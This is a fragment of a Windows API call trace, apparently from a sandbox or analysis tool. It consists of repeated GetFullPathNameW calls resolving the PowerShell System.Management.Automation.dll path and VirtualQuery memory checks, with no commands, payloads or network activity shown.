	[0285.646] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbbe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.647] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbbe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.647] VirtualQuery (in: lpAddress=0xcb4d0, lpBuffer=0xcc390, dwLength=0x30 | out: lpBuffer=0xcc390*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0285.647] VirtualQuery (in: lpAddress=0xcb560, lpBuffer=0xcc420, dwLength=0x30 | out: lpBuffer=0xcc420*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0285.647] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbc90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.647] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbbe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.647] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbbe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.648] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc050, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.648] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbfa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.648] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbfa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.648] VirtualQuery (in: lpAddress=0xcb4d0, lpBuffer=0xcc390, dwLength=0x30 | out: lpBuffer=0xcc390*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0285.648] VirtualQuery (in: lpAddress=0xcb560, lpBuffer=0xcc420, dwLength=0x30 | out: lpBuffer=0xcc420*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0285.649] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbc90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.649] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbbe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.649] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbbe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.649] VirtualQuery (in: lpAddress=0xcb4d0, lpBuffer=0xcc390, dwLength=0x30 | out: lpBuffer=0xcc390*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0285.649] VirtualQuery (in: lpAddress=0xcb560, lpBuffer=0xcc420, dwLength=0x30 | out: lpBuffer=0xcc420*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0285.650] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc050, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.650] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbfa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.650] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbfa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.650] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc050, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.651] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbfa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.651] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbfa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.651] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc050, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.651] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbfa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.652] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbfa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.652] VirtualQuery (in: lpAddress=0xcb4d0, lpBuffer=0xcc390, dwLength=0x30 | out: lpBuffer=0xcc390*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0285.652] VirtualQuery (in: lpAddress=0xcb560, lpBuffer=0xcc420, dwLength=0x30 | out: lpBuffer=0xcc420*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0285.652] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbc90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.652] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbbe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.653] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbbe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.653] VirtualQuery (in: lpAddress=0xcb4d0, lpBuffer=0xcc390, dwLength=0x30 | out: lpBuffer=0xcc390*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0285.653] VirtualQuery (in: lpAddress=0xcb560, lpBuffer=0xcc420, dwLength=0x30 | out: lpBuffer=0xcc420*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0285.653] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbc90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.653] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbbe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.654] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbbe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.654] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc960, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.654] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc8b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.654] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc8b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.655] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc7d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.655] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.655] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.655] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xccaf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.656] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcca40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.656] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcca40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.656] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xccaf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.656] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcca40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.657] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcca40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.657] VirtualQuery (in: lpAddress=0xcbf70, lpBuffer=0xcce30, dwLength=0x30 | out: lpBuffer=0xcce30*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0285.657] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc730, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.657] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc680, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.658] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc680, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.658] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc1e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.658] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc130, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.658] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc130, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.659] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc1e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.659] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc130, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.659] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc130, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.659] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc1e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.660] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc130, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.660] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc130, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.660] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc1e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.660] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc130, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.661] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc130, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.661] VirtualQuery (in: lpAddress=0xcbf70, lpBuffer=0xcce30, dwLength=0x30 | out: lpBuffer=0xcce30*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0285.661] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc730, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.661] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc680, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.662] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc680, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.662] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc1e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.662] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc130, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
